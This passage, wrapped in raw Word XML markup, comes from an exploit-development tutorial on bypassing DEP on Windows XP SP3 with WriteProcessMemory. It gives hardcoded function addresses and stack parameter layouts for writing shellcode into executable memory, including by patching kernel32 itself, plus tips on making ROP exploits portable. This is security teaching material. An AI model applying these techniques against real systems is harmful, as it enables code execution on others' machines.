      <w:hyperlink r:id="rId42">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://msdn.microsoft.com/en-us/library/ms681674(VS.85).aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Technique documented by Spencer Pratt : </w:t>
      </w:r>
      <w:hyperlink r:id="rId43">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://www.packetstormsecurity.org/papers/general/Windows-DEP-WPM.txt</w:t>
        </w:r>
      </w:hyperlink>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BOOL WINAPI WriteProcessMemory(</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HANDLE hProcess,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LPVOID lpBaseAddress,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LPCVOID lpBuffer,</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SIZE_T nSize,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__out  SIZE_T *lpNumberOfBytesWritten</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This function will allow you to copy your shellcode to another (executable) location so you can jump to it &amp; execute it. During the copy, WPM() will make sure the destination location is marked as writeable. You only have to make sure the target destination is executable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This function requires 6 parameters on the stack :</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="28" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="28" w:type="dxa"/>
          <w:left w:w="28" w:type="dxa"/>
          <w:bottom w:w="28" w:type="dxa"/>
          <w:right w:w="28" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2614"/>
        <w:gridCol w:w="7024"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2614"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return address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7024"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Address where WriteProcessMemory() needs to return to after it finished</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="261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hProcess</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="702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the handle of the current process. Should be -1 to point to the current process (Static value 0xFFFFFFFF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="261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lpBaseAddress</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="702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pointer to the location where your shellcode needs to be written to. The "return address" and "lpBaseAddress" will be the same.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="261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lpBuffer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="702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based address of your shellcode (dynamically generated, address on the stack)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="261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nSize</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="702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number of bytes that need to be copied to the destination location</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="261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lpNumberOfBytesWritten</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="702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writeable location, where number of bytes will be written to</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>On XP SP3, WriteProcessMemory() is located at 0x7C802213 (kernel32.dll)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>One of the nice things about WriteProcessMemory()  (abbreviated to WPM() from this point forward) is the fact that you can use it in 2 ways to gain DEP bypass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>* WPM Technique 1 : full WPM() call</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>You can copy/write your shellcode to an executable location and jump to it. This technique requires all WPM() parameters to be set up correctly.   A possible example for XP SP3 would be patching oleaut32.dll (which is loaded in many applications). Oleaut32.dll is most likely not going to be used in your shellcode, so it would be acceptable to "corrupt" it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The .text section if oleaut32.dll is R E, begins at 0x77121000 and is 7F000 bytes long.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5276850" cy="733425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="Image6" descr="">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a:hlinkClick r:id="rId45"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5276850" cy="733425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:ind w:left="567" w:right="567" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>There is a problem with this approach. Since you will be writing to a R+E area, the shellcode will not be able to modify itself. (The WriteProcessMemory call will temporarily mark the location as writeable, but removes the level again.) This means that, if you are using encoded shellcode (or shellcode that modifies itself), it will not work.  This can be an issue because of bad chars etc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:ind w:left="567" w:right="567" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Of course, you could try to prepend the real shellcode with some small shellcode that would use virtualprotect() for example, to mark it’s own location as writable.  You can find an example on how to do this, in the "Egghunter" section</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>We need 2 addresses : one to be used as return address / destination address, and one that will be used as writeable location (where ‘number of bytes written’ will be written to).  So a good example would be :</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="28" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="28" w:type="dxa"/>
          <w:left w:w="28" w:type="dxa"/>
          <w:bottom w:w="28" w:type="dxa"/>
          <w:right w:w="28" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5963"/>
        <w:gridCol w:w="3674"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5963"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return address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3674"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0x77121010</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5963"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hProcess</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="367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0xFFFFFFFF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5963"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lpBaseAddress</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="367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0x77121010</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5963"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lpBuffer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="367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to be generated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5963"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nSize</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="367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to be generated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5963"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lpNumberOfBytesWritten</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3674"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0x77121004</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>(the lpNumberOfBytesWritten is located before the destination location, to avoid that it would corrupt the shellcode after it was copied to the destination)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If you want to use shellcode that uses a decoder, you will have to prepend your shellcode with a call to virtualprotect or so, to mark the current region as writable / executable  (depending on whether you are writing to a RE or RW area) before running the encoded shellcode..</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>* WPM Technique 2 : patch WPM() itself</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Alternatively, you can also "patch" the WPM function itself. So basically you would be writing your shellcode into kernel32.dll, overwriting a part of the WPM function.  This will solve the issue with encoded shellcode (but it has a size limitation as you will see in a few moments)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>On XP SP3, the WPM function is located at 0x7C802213</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3419475" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="Image7" descr="">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a:hlinkClick r:id="rId47"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3419475" cy="1066800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Inside the WPM function, a number of CALL’s and jumps are made to actually copy the data (shellcode) from the stack to the destination location  :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x7C802222 : call ntdll.ZwProtectVirtualMemory() : this function call will make sure the target location will become writeable </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x7C802271 : call ntdll.ZwWriteVirtualMemory() </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x7C80228B : call ntdll.ZwFlushInstructionCache()) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x7C8022C9 : call ntdll.ZwWriteVirtualMemory() </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>After the last function call is made, the data will be copied into the destination location.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Then, when the copy itself is made, the function will write the "number of bytes" written and will then return to the return address specified as a parameter.  This final routine starts at 7C8022CF (so right after the last call to WriteVirtualMemory())</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>So our second option would be to write the shellcode on top of the code that would write the "number of bytes" and would return to the caller. We don’t really need to wait for the code to write those bytes and return to the call, because all we really want to do is execute the shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Again (and as you can see in the disassembly below), when the WPM function has finished the copy process, it returns to 0x7C8022CF. So that might be a good location to use as destination address, because it would sit in the natural flow of the application and would thus get executed automatically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5591175" cy="4248150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8" name="Image8" desc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a:hlinkClick r:id="rId49"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5591175" cy="4248150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This has a few consequences :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Parameters</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> : The first (return address) and last parameter (pointer to writeable address for lpNumberOfBytesWritten) are not really important anymore. You can just set the return address to 0xFFFFFFFF for example. Although Spencer Pratt stated in his </w:t>
      </w:r>
      <w:hyperlink r:id="rId50" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>paper</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> that the lpNumberOfBytesWritten can be set to any value (0xDEADBEEF if you will), it appears that this address still needs to point to a writable location to make it work. In addition to that, the destination address (so where the shellcode must be written into) points inside the WPM function itself.   On XP SP3, this would be 0x7C8022CF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Size</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> : Hot patching the WPM function looks nice, but it might corrupt kernel32.dll if we write too far.  kernel32.dll might be important for the shellcode itself. It is very likely that your shellcode will use functions in kernel32.dll.  If you corrupt the kernel32.dll structure, your shellcode may not be able to run either. So this technique would work for cases where your shellcode size is limited)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Example stack layout / function parameters :</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6840" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="28" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="28" w:type="dxa"/>
          <w:left w:w="28" w:type="dxa"/>
          <w:bottom w:w="28" w:type="dxa"/>
          <w:right w:w="28" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2615"/>
        <w:gridCol w:w="4225"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2615"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return address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4225"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0xFFFFFFFF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2615"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hProcess</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4225"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0xFFFFFFFF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2615"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lpBaseAddress</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4225"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0x7C8022CF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2615"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lpBuffer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4225"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to be generated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2615"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nSize</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4225"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to be generated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2615"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lpNumberOfBytesWritten</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4225"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use a (any) writable location, can be static</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="transportability"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr/>
        <w:t>ROP Exploit transportability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When you start to build ROP exploits, you will most likely end up hard coding the function pointer address in your exploit. While there may be ways to avoid doing that, if you do have to hardcode pointers, you already know that your exploit may not work across other versions of the Windows operating system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>So, if you have hardcoded pointers to windows functions, then it would be ok to use gadgets from OS dll’s as well. As long as we don’t have to deal with ASLR, then all of that is fine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Trying to build a generic exploit is nice, but let’s be honest – you only need to avoid OS dll’s if you are not hard coding anything from an OS dll.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Either way, It might be a good idea to verify if the application uses the function that you want to use to bypass DEP, and see if you can call that functions using an application/module pointer. That way, you can still make the exploit portable, without having to generate the function address, and without having to hardcode addresses from an OS dll.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A possible way to find out if you can use an API call from within the application or application dll’s is by loading the executable / modules in IDA, and looking at the "Imports" section</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
